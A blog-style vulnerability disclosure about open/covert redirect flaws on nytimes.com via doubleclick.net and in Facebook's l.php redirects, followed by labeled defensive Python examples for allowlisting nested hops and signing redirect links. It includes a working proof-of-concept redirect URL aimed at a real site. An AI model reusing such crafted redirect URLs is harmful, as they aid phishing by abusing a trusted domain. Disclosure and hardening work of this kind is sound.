<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;"><a href="https://www.youtube.com/watch?v=a4H-u17Y9ks" style="background-color: white;" target="_blank">https://www.youtube.com/watch?<wbr></wbr>v=a4H-u17Y9ks</a></span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;">Blog:</span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;"><a href="http://tetraph.blogspot.com/2014/11/ebay-covert-redirect-vulnerability.html" style="background-color: white;" target="_blank">http://tetraph.blogspot.com/<wbr></wbr>2014/11/ebay-covert-redirect-<wbr></wbr>vulnerability.html</a></span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
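<div>
An added example, not code from the original post or from any of the sites named here: a server-side check for the redirect parameters seen in the URLs listed in these sections (<code>continue</code>, <code>mpre</code>, <code>goto</code>). It shows why comparing only the first-hop host to an allowlist passes a target that carries a further destination in <code>adurl</code> or in its raw query string. The host <code>shop.example</code>, the allowlist, the function names and the sample URLs are constructed assumptions.</div>

```python
from urllib.parse import urlsplit, parse_qs, parse_qsl, unquote, quote

# Assumption (constructed policy): the site's own host plus the two ad hosts
# that appear as first-hop redirect targets in the URLs listed on this page.
ALLOWED_HOSTS = {"shop.example", "googleads.g.doubleclick.net", "ad.doubleclick.net"}
MAX_DEPTH = 5  # refuse targets that nest redirects deeper than this


def target_of(request_url, param):
    """Return the decoded value of a redirect parameter (continue, mpre, goto)."""
    values = parse_qs(urlsplit(request_url).query).get(param, [])
    return values[0] if values else None


def embedded_urls(url):
    """Yield every absolute URL carried inside the query string of `url`.

    Two shapes are covered: a named parameter whose value is a URL
    (adurl=http://...), and a query string that is itself a URL
    (.../clk/1;2;s?http://...).
    """
    query = urlsplit(url).query
    candidates = [value for _, value in parse_qsl(query, keep_blank_values=True)]
    candidates.append(unquote(query))
    for candidate in candidates:
        parts = urlsplit(candidate)
        # scheme "" together with a hostname means a scheme-relative //host/ URL
        if parts.hostname and parts.scheme in ("", "http", "https"):
            yield candidate


def hosts_in_chain(url, depth=0):
    """List the host of `url` followed by the hosts of all URLs nested in it."""
    host = urlsplit(url).hostname
    if host is None:
        raise ValueError("not an absolute URL")
    if depth > MAX_DEPTH:
        raise ValueError("redirect nesting too deep")
    hosts = [host]
    for inner in embedded_urls(url):
        hosts.extend(hosts_in_chain(inner, depth + 1))
    return hosts


def naive_check(target):
    """Weak form: only the first hop is compared to the allowlist."""
    return urlsplit(target).hostname in ALLOWED_HOSTS


def strict_check(target):
    """Hardened form: every hop nested in the target must be allowlisted."""
    try:
        return all(host in ALLOWED_HOSTS for host in hosts_in_chain(target))
    except ValueError:
        return False  # malformed, relative, or too deeply nested


# Constructed sample targets that mirror the shapes of the URLs on this page.
VIA_ADURL = ("http://googleads.g.doubleclick.net/aclk?sa=L&ai=TOKEN"
             "&adurl=http://unlisted.example/landing")
VIA_RAW_QUERY = ("http://ad.doubleclick.net/ddm/clk/1;2;s?"
                 "http://unlisted.example/page?utm_source=x&utm_medium=display")
VIA_ADURL_OK = ("http://googleads.g.doubleclick.net/aclk?sa=L"
                "&adurl=https://shop.example/item/1")
DIRECT_OK = "https://shop.example/account"

# Constructed incoming request: the target arrives percent-encoded in `continue`.
REQUEST = "https://shop.example/logout?service=x&continue=" + quote(VIA_ADURL, safe="")

if __name__ == "__main__":
    target = target_of(REQUEST, "continue")
    print("target:", target)
    for sample in (VIA_ADURL, VIA_RAW_QUERY, VIA_ADURL_OK, DIRECT_OK):
        print(naive_check(sample), strict_check(sample), hosts_in_chain(sample))
```

Relative targets are rejected by this example because it only models absolute URLs; a site that redirects to its own paths would handle those separately.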
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><span style="font-size: small;"><b>(3.3) </b></span><b>The New York Times (Nytimes.com) Covert Redirect Vulnerability Based on Google Doubleclick.net</b></span><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span>
<b><span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">Domain:</span></b><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">nytimes.com</span><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">"The New York Times (NYT) is an American daily newspaper, founded and continuously published in New York City since September 18, 1851, by the New York Times Company. It has won 114 Pulitzer Prizes, more than any other news organization. The paper's print version has the largest circulation of any metropolitan newspaper in the United States, and the second-largest circulation overall, behind The Wall Street Journal. It is ranked 39th in the world by circulation. Following industry trends, its weekday circulation has fallen to fewer than one million daily since 1990. Nicknamed for years as "The Gray Lady", The New York Times is long regarded within the industry as a national "newspaper of record". It is owned by The New York Times Company. Arthur Ochs Sulzberger, Jr., (whose family (Ochs-Sulzberger) has controlled the paper for five generations, since 1896), is both the paper's publisher and the company's chairman. Its international version, formerly the International Herald Tribune, is now called the International New York Times." (Wikipedia)</span><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;">Vulnerable URL:</span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;"><a href="http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=www.nytimes.com/pages/nyregion/index.html&pos=SFMiddle&sn2=8dfce1f6/9926f9b3&sn1=bbba504f/c0de9221&camp=CouplesResorts_1918341&ad=NYRegionSF_Feb_300x250-B5732328.10663001&goto=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fddm%2Fclk%2F279541164%3B106630011%3Bs%3Fhttp%3A%2F%2Ffacebook%2Ecom%2Fall%2Dinclusive%2Ephp%3Futm%5Fsource%3Dnyt%26utm%5Fmedium%3Ddisplay%26utm%5Fcontent%3Dclicktracker%26utm%5Fcampaign%3D300x250%5FExpectMore%5FNYT%5FNYRegion" style="background-color: white;" target="_blank">http://www.nytimes.com/adx/<wbr></wbr>bin/adx_click.html?type=goto&<wbr></wbr>opzn&page=www.nytimes.com/<wbr></wbr>pages/nyregion/index.html&pos=<wbr></wbr>SFMiddle&sn2=8dfce1f6/<wbr></wbr>9926f9b3&sn1=bbba504f/<wbr></wbr>c0de9221&camp=CouplesResorts_<wbr></wbr>1918341&ad=NYRegionSF_Feb_<wbr></wbr>300x250-B5732328.10663001&<wbr></wbr>goto=http%3A%2F%2Fad%<wbr></wbr>2Edoubleclick%2Enet%2Fddm%<wbr></wbr>2Fclk%2F279541164%3B106630011%<wbr></wbr>3Bs%3Fhttp%3A%2F%2Ffacebook%<wbr></wbr>2Ecom%2Fall%2Dinclusive%2Ephp%<wbr></wbr>3Futm%5Fsource%3Dnyt%26utm%<wbr></wbr>5Fmedium%3Ddisplay%26utm%<wbr></wbr>5Fcontent%3Dclicktracker%<wbr></wbr>26utm%5Fcampaign%3D300x250%<wbr></wbr>5FExpectMore%5FNYT%5FNYRegion</a></span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;">POC:</span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;"><a href="http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=www.nytimes.com/pages/nyregion/index.html&pos=SFMiddle&sn2=8dfce1f6/9926f9b3&sn1=bbba504f/c0de9221&camp=CouplesResorts_1918341&ad=NYRegionSF_Feb_300x250-B5732328.10663001&goto=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fddm%2Fclk%2F279541164%3B106630011%3Bs%3Fhttp%3A%2F%2Ftetraph%2Ecom%2Fsecurity%3F%2Dinclusive%2Ephp%3Futm%5Fsource%3Dnyt%26utm%5Fmedium%3Ddisplay%26utm%5Fcontent%3Dclicktracker%26utm%5Fcampaign%3D300x250%5FExpectMore%5FNYT%5FNYRegion" style="background-color: white;" target="_blank">http://www.nytimes.com/adx/<wbr></wbr>bin/adx_click.html?type=goto&<wbr></wbr>opzn&page=www.nytimes.com/<wbr></wbr>pages/nyregion/index.html&pos=<wbr></wbr>SFMiddle&sn2=8dfce1f6/<wbr></wbr>9926f9b3&sn1=bbba504f/<wbr></wbr>c0de9221&camp=CouplesResorts_<wbr></wbr>1918341&ad=NYRegionSF_Feb_<wbr></wbr>300x250-B5732328.10663001&<wbr></wbr>goto=http%3A%2F%2Fad%<wbr></wbr>2Edoubleclick%2Enet%2Fddm%<wbr></wbr>2Fclk%2F279541164%3B106630011%<wbr></wbr>3Bs%3Fhttp%3A%2F%2Ftetraph%<wbr></wbr>2Ecom%2Fsecurity%3F%<wbr></wbr>2Dinclusive%2Ephp%3Futm%<wbr></wbr>5Fsource%3Dnyt%26utm%5Fmedium%<wbr></wbr>3Ddisplay%26utm%5Fcontent%<wbr></wbr>3Dclicktracker%26utm%<wbr></wbr>5Fcampaign%3D300x250%<wbr></wbr>5FExpectMore%5FNYT%5FNYRegion</a></span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;">More Details:</span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;">Video:</span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;"><a href="https://www.youtube.com/watch?v=3XtrUqzxNW0" style="background-color: white;" target="_blank">https://www.youtube.com/watch?<wbr></wbr>v=3XtrUqzxNW0</a></span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;">Blog:</span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;"><a href="http://computerobsess.blogspot.com/2014/11/nytimes-covert-redirect-vulnerability.html" style="background-color: white;" target="_blank">http://computerobsess.<wbr></wbr>blogspot.com/2014/11/nytimes-<wbr></wbr>covert-redirect-vulnerability.<wbr></wbr>html</a></span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;">These vulnerabilities were reported to Google earlier in 2014, but it seems that Google has not yet taken any action. All of the vulnerabilities are still unpatched.</span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
</div>
essayjeanshttp://www.blogger.com/profile/11019920613685827608noreply@blogger.com1tag:blogger.com,1999:blog-827796800660023204.post-10113052826139841622015-06-04T21:55:00.000-07:002015-06-04T21:56:58.223-07:00Facebook Old Generated URLs Still Vulnerable to Open Redirect Attacks & A New Open Redirect Web Security Bugs<div style="background-color: white;">
<div>
<a href="http://4.bp.blogspot.com/-ByWUzVtJdRQ/VXEc20I6JpI/AAAAAAAAA-Q/RjJ4yZGoRj4/s1600/facebook_0.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><span style="color: black; font-family: Arial, Helvetica, sans-serif;"><img border="0" height="266" src="http://4.bp.blogspot.com/-ByWUzVtJdRQ/VXEc20I6JpI/AAAAAAAAA-Q/RjJ4yZGoRj4/s400/facebook_0.jpg" width="400" /></span></a><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<b><span style="font-family: Arial, Helvetica, sans-serif;">Facebook Old Generated URLs Still Vulnerable to Open Redirect Attacks & A New Open Redirect Web Security Bugs</span></b><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><b>Domain:</b></span></div>
<div>
<a href="http://www.facebook.com/" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://www.facebook.com</span></a></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;">"Facebook is an online social networking service headquartered in Menlo Park, California. Its website was launched on February 4, 2004, by Mark Zuckerberg with his college roommates and fellow Harvard University students Eduardo Saverin, Andrew McCollum, Dustin Moskovitz and Chris Hughes. The founders had initially limited the website's membership to Harvard students, but later expanded it to colleges in the Boston area, the Ivy League, and Stanford University. It gradually added support for students at various other universities and later to high-school students. Since 2006, anyone who is at least 13 years old is allowed to become a registered user of the website, though the age requirement may be higher depending on applicable local laws. Its name comes from a colloquialism for the directory given to it by American universities students." (Wikipedia)</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">"Facebook had over 1.44 billion monthly active users as of March 2015. Because of the large volume of data users submit to the service, Facebook has come under scrutiny for their privacy policies. Facebook, Inc. held its initial public offering in February 2012 and began selling stock to the public three months later, reaching an original peak market capitalization of $104 billion. As of February 2015 Facebook reached a market capitalization of $212 Billion." (Wikipedia)</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><b><br /></b><b>Discover:</b></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><span style="line-height: 17.8181819915772px; text-align: justify;">Wang Jing, </span><span style="line-height: 17.8181819915772px; text-align: justify;">Division of Mathematical Sciences (MAS), </span><span style="line-height: 17.8181819915772px; text-align: justify;">School of Physical and Mathematical Sciences (SPMS), </span><span style="line-height: 17.8181819915772px; text-align: justify;">Nanyang Technological University (NTU), </span><span style="line-height: 17.8181819915772px; text-align: justify;">Singapore. (<a href="https://twitter.com/justqdjing/status/554206258413043713" target="_blank">@justqdjing</a>)</span></span></div>
<div>
<a href="http://www.tetraph.com/wangjing/" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://www.tetraph.com/<wbr></wbr>wangjing/</span></a></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><b><br /></b><b><br /></b><b>(1) General Vulnerabilities Description:</b></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><b>(1.1)</b> <b>Two Facebook vulnerabilities are introduced in this article.</b></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">Facebook has a web security bug that can be exploited in Open Redirect attacks. It allows an attacker to create a specially crafted URL that, if clicked, redirects a victim from the intended legitimate web site to an arbitrary web site of the attacker's choosing. Such attacks are effective because the crafted URL initially appears to be a web page of a trusted site. This could be leveraged to direct an unsuspecting user to a web page containing attacks that target client-side software such as a web browser or document rendering programs.</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;">Because Facebook is trusted by a large number of other websites, these vulnerabilities can be used to perform "Covert Redirect" to other websites such as Amazon, eBay, GoDaddy, Yahoo, 163, Mail.ru etc.</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><b>(1.1.1)</b></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">One Facebook Open Redirect vulnerability was reported to Facebook, and Facebook adopted a new mechanism to patch it. Although the reported URL redirection vulnerabilities are patched, all old generated URLs are still vulnerable to the attacks. Section (2) gives the details.</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">The reason may be related to Facebook's third-party interaction system or database management system or both. Another reason may be related to Facebook's design for different kinds of browsers.</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><b>(1.1.2)</b> Another new Open Redirect vulnerability related to Facebook is introduced, too. For reference, please read section (3).</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;">The vulnerabilities can be exploited without user login. Tests were performed on IE (9.0) on Windows 8, Firefox (24.0) & Google Chromium 30.0.1599.114 ubuntu0.14.04.1.1064 (64-bit) on Ubuntu (12.10), and Safari 6.1.6 on Mac OS X Lion 10.7.</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><b>(1.2)</b> Facebook's URL Redirection System Related to "*.php" Files</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">All URL redirections are based on several files, such as l.php, a.php, landing.php and so on.</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">The main redirection is based on the file "l.php" (almost all redirection links use it right now).</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">For the file "l.php", the parameter "h" is used for authentication. For the file "a.php", the parameter "eid" is used for authentication. Both files use the parameter "u" for the URL redirected to. In some other files such as "landing.php", parameters such as "url" and "next" are used.</span></div>
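<div>
<span style="font-family: Arial, Helvetica, sans-serif;">Added example (not from the original post and not Facebook's code): one way a redirect endpoint can keep links generated before a fix, as described in (1.1.1), from being honoured afterwards. It binds the authentication value "h" to the target "u" with an HMAC and adds a key version "v" and an issue time "t"; "v", "t", the host names and the keys are assumptions made for this example.</span></div>

```python
import hashlib
import hmac
from urllib.parse import parse_qs, urlencode, urlsplit

# Constructed demo keys. Version 1 stands for the scheme in use before a fix;
# it is kept here only so the example can mint an "old generated URL".
RETIRED_KEYS = {1: b"constructed-key-v1"}
ACTIVE_KEYS = {2: b"constructed-key-v2"}
MAX_AGE = 24 * 3600  # seconds a generated link stays valid (assumed policy)


def _tag(key, target, issued):
    """HMAC over issue time and target, so the tag cannot be reused for another URL."""
    msg = f"{issued}|{target}".encode()
    return hmac.new(key, msg, hashlib.sha256).hexdigest()


def make_link(target, version, key, issued):
    """Build a redirect link: u = target, h = tag, v = key version, t = issue time."""
    query = urlencode(
        {"u": target, "h": _tag(key, target, issued), "v": version, "t": issued}
    )
    return "https://site.example/l.php?" + query  # hypothetical host


def check_link(link, now):
    """Return (True, target) if the redirect may proceed, else (False, reason)."""
    params = parse_qs(urlsplit(link).query)
    try:
        target = params["u"][0]
        tag = params["h"][0]
        version = int(params["v"][0])
        issued = int(params["t"][0])
    except (KeyError, ValueError):
        # Links from before versioning carry no v/t and are refused outright.
        return False, "malformed or legacy link"
    key = ACTIVE_KEYS.get(version)
    if key is None:
        return False, "retired key version"
    expected = _tag(key, target, issued)
    if not hmac.compare_digest(tag.encode(), expected.encode()):
        return False, "tag does not match target"
    if issued > now or now - issued > MAX_AGE:
        return False, "expired"
    if urlsplit(target).scheme not in ("http", "https"):
        return False, "unsupported scheme"
    return True, target


def demo():
    """Run the checks over constructed links and return the verdicts."""
    now = 1_700_000_000  # constructed timestamp
    page = "https://partner.example/page"
    fresh = make_link(page, 2, ACTIVE_KEYS[2], now - 60)
    links = {
        "fresh": fresh,
        # Generated under the scheme that was replaced by the fix.
        "old": make_link(page, 1, RETIRED_KEYS[1], now - 60),
        # Valid key, but issued 30 days ago.
        "stale": make_link(page, 2, ACTIVE_KEYS[2], now - 30 * 24 * 3600),
        # Same tag, different destination.
        "swapped": fresh.replace("partner.example", "other.example"),
        # Pre-versioning form with only u and h.
        "legacy": "https://site.example/l.php?"
        + urlencode({"u": page, "h": "constructed-tag"}),
        "scheme": make_link("ftp://partner.example/file", 2, ACTIVE_KEYS[2], now - 60),
    }
    return {name: check_link(link, now) for name, link in links.items()}


if __name__ == "__main__":
    for name, verdict in demo().items():
        print(name, verdict)
```
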
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
